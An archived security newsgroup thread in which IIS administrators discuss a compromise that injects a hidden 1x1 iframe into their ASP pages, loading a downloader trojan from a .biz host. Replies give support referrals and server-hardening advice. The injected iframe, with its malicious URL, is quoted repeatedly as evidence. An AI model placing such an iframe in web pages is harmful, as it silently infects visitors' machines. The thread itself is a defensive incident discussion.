|
security
newsgroups
|
|||||||||||||||||||||||
|
|||||||||||||||||||||||
Virus in IFRAME injected into our ASP pages (downloader trojan on client)Antivirus (Symantec Corporate) when run on the server doesn't detect it. It is a Windows Server 2003 Standard server, running SP1 and all the latest patches. IIS sends down a website to the user with IFRAMEs injected into the HTML: <TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0 ></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.phpwidth=1 height=1></iframe></TD></A></TR></TABLE></TD> The iframe code above pointing to xaqjlyswly.biz does not come from our code. I looked at the ASP function that generates this link and there is nothing there that would put that on the page. The iframe tries to get the user's browser to download the Downloader virus which, according to Symantec "connects to the Internet and downloads other Trojan horses" http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99 My local antivirus on my machine caught downloader getting installed after browsing the site on the infected server. I used Agent Ransack to look for the string ".biz" across all our websites source code. The string wasn't found anywhere. That all leads me to believe that something is getting injected into the code before it is sent to the end user. I found an older virus that has similar characteristics called Download.Ject which infected IIS also. I followed Microsoft's suggestions for detecting Download.Ject and we don't have it. Any ideas? Hi Paul,
I believe the current situation indicates your web server got hacked/attacked. For suck kind of urgent cases of Virus/Trojan, I would like to suggest that you contact Microsoft Customer Service and Support services as well as some third-party security and anti-virus services vendor like Symantec for assistance. You can call our support center via telephone so that a dedicated Support Professional can assist with this request. To obtain the phone numbers for specific technology request please take a look at the web site listed below. http://support.microsoft.com/default.aspx?scid=fh;EN-US;PHONENUMBERS If you are outside the US please see http://support.microsoft.com for regional support phone numbers. Thanks. Sincerely, WenJun Zhang Microsoft Online Community Support ================================================== Get notification to my posts through email? Please refer to: http://msdn.microsoft.com/subscriptions/managednewsgroups/default.aspx#notif ications. Note: The MSDN Managed Newsgroup support offering is for non-urgent issues where an initial response from the community or a Microsoft Support Engineer within 1 business day is acceptable. Please note that each follow up response may take approximately 2 business days as the support professional working with you may need further investigation to reach the most efficient resolution. The offering is not appropriate for situations that require urgent, real-time or phone-based interactions or complex project analysis and dump analysis issues. Issues of this nature are best handled working with a dedicated Microsoft Support Engineer by contacting Microsoft Customer Support Services (CSS) at: http://msdn.microsoft.com/subscriptions/support/default.aspx. ================================================== This posting is provided "AS IS" with no warranties, and confers no rights. We had the same problem on our windows 2003 server today.
We cannot find any information anywhere. Any ideas??? Paul Oliver a écrit : Show quoteHide quote > Our website was compromised sometime in the last few days, but our > Antivirus (Symantec Corporate) when run on the server doesn't detect it. > > It is a Windows Server 2003 Standard server, running SP1 and all the > latest patches. IIS sends down a website to the user with IFRAMEs > injected into the HTML: > > <TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG > NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0 > ></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self > CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php > width=1 height=1></iframe></TD></A></TR></TABLE></TD> > > The iframe code above pointing to xaqjlyswly.biz does not come from our > code. I looked at the ASP function that generates this link and there > is nothing there that would put that on the page. > > The iframe tries to get the user's browser to download the Downloader > virus which, according to Symantec "connects to the Internet and > downloads other Trojan horses" > > http://www.symantec.com/security_response/writeup.jsp?docid 02-101518-4323-99 > > My local antivirus on my machine caught downloader getting installed > after browsing the site on the infected server. > > I used Agent Ransack to look for the string ".biz" across all our > websites source code. The string wasn't found anywhere. > > That all leads me to believe that something is getting injected into the > code before it is sent to the end user. > > I found an older virus that has similar characteristics called > Download.Ject which infected IIS also. I followed Microsoft's > suggestions for detecting Download.Ject and we don't have it. > > Any ideas? In article <uelbG$kGHHA.***@TK2MSFTNGP02.phx.gbl>,
PaulOliver@noemail.noemail says... Show quoteHide quote > Our website was compromised sometime in the last few days, but our The reason that Symantec didn't detect it on the server is because the > Antivirus (Symantec Corporate) when run on the server doesn't detect it. > > It is a Windows Server 2003 Standard server, running SP1 and all the > latest patches. IIS sends down a website to the user with IFRAMEs > injected into the HTML: > > <TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG > NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0 > ></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self > CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php > width=1 height=1></iframe></TD></A></TR></TABLE></TD> > > The iframe code above pointing to xaqjlyswly.biz does not come from our > code. I looked at the ASP function that generates this link and there > is nothing there that would put that on the page. threat (malware) is not on your server, it's on the remote server. Show quoteHide quote > The iframe tries to get the user's browser to download the Downloader Put a real firewall in front of your server, block all foreign subnets > virus which, according to Symantec "connects to the Internet and > downloads other Trojan horses" > > http://www.symantec.com/security_response/writeup.jsp?docid=2002-101518-4323-99 > > My local antivirus on my machine caught downloader getting installed > after browsing the site on the infected server. > > I used Agent Ransack to look for the string ".biz" across all our > websites source code. The string wasn't found anywhere. > > That all leads me to believe that something is getting injected into the > code before it is sent to the end user. > > I found an older virus that has similar characteristics called > Download.Ject which infected IIS also. I followed Microsoft's > suggestions for detecting Download.Ject and we don't have it. > > Any ideas? not required, rename the administrator account and disable all accounts not needed, patch the server, etc... Follow ALL of the recommendations that secure your server. What services, other than HTTP did you expose? -- spam999free@rrohio.com remove 999 in order to email me We had to reinstall IIS on the server and it did the trick.
By the way, we tried windows defender and windows removing tools, both didn't found anything. And after our tests, IIS was really compromise. Any website running asp or aspx pages inject the iframe code. The hack seems to have been at the core of IIS. ASAPI filter desactivation didn't do the trick. Any idea anyone what it was? Leythos a écrit : Show quoteHide quote > In article <uelbG$kGHHA.***@TK2MSFTNGP02.phx.gbl>, > PaulOliver@noemail.noemail says... > > Our website was compromised sometime in the last few days, but our > > Antivirus (Symantec Corporate) when run on the server doesn't detect it. > > > > It is a Windows Server 2003 Standard server, running SP1 and all the > > latest patches. IIS sends down a website to the user with IFRAMEs > > injected into the HTML: > > > > <TD><TABLE><TR><TD><A HREF="news.asp?ID=194" TARGET=_self ><IMG > > NAME="news194" SRC="images/newsClip.png" ALT="*" BORDER=0 > > ></A></TD><TD><A HREF="news.asp?ID=194" TARGET=_self > > CLASS="ltblue"></a><iframe src=http://xaqjlyswly.biz/dl/adv448.php > > width=1 height=1></iframe></TD></A></TR></TABLE></TD> > > > > The iframe code above pointing to xaqjlyswly.biz does not come from our > > code. I looked at the ASP function that generates this link and there > > is nothing there that would put that on the page. > > The reason that Symantec didn't detect it on the server is because the > threat (malware) is not on your server, it's on the remote server. > > > The iframe tries to get the user's browser to download the Downloader > > virus which, according to Symantec "connects to the Internet and > > downloads other Trojan horses" > > > > http://www.symantec.com/security_response/writeup.jsp?docid 02-101518-4323-99 > > > > My local antivirus on my machine caught downloader getting installed > > after browsing the site on the infected server. > > > > I used Agent Ransack to look for the string ".biz" across all our > > websites source code. The string wasn't found anywhere. > > > > That all leads me to believe that something is getting injected into the > > code before it is sent to the end user. > > > > I found an older virus that has similar characteristics called > > Download.Ject which infected IIS also. I followed Microsoft's > > suggestions for detecting Download.Ject and we don't have it. > > > > Any ideas? > > Put a real firewall in front of your server, block all foreign subnets > not required, rename the administrator account and disable all accounts > not needed, patch the server, etc... Follow ALL of the recommendations > that secure your server. > > What services, other than HTTP did you expose? > > -- > > spam999free@rrohio.com > remove 999 in order to email me In article <1165843984.956869.252***@16g2000cwy.googlegroups.com>,
dc***@dgmdata.com says... > We had to reinstall IIS on the server and it did the trick. I don't think so, sure it got it working again, but, reinstalling IIS does not resolve the root cause. > By the way, we tried windows defender and windows removing tools, both Windows Defender is worthless and unless you setup your server properly > didn't found anything. And after our tests, IIS was really compromise. > Any website running asp or aspx pages inject the iframe code. The hack > seems to have been at the core of IIS. ASAPI filter desactivation > didn't do the trick. it will happen again. I've had hundreds of IIS based webservers online since the late days of NT4 and never had one compromised. You need to properly configured and properly firewall your server, and you need to properly code sites so that you don't expose your site to exploits in website code. > No, but you might be able to find information on google.com> Any idea anyone what it was? -- spam999free@rrohio.com remove 999 in order to email me 
Other interesting topics
Win2K3, IIS6, and IE6 - Can't get IWA/NTLM to work
MS IIS Setting: HTTP Failed To Connect if Using Machine Name Diff behavior for "Integrated windows authentication" in IIS6 Vs I notepad will not save .config file in iis7 RPC over HTTPS for Exchange IIS Security and files upload/create "Certificate does not have a private key" Multiple SSL - Same Server - Same Port/IP Multiple SSL sites served from a single content path IWA connect to fileserver |
|||||||||||||||||||||||
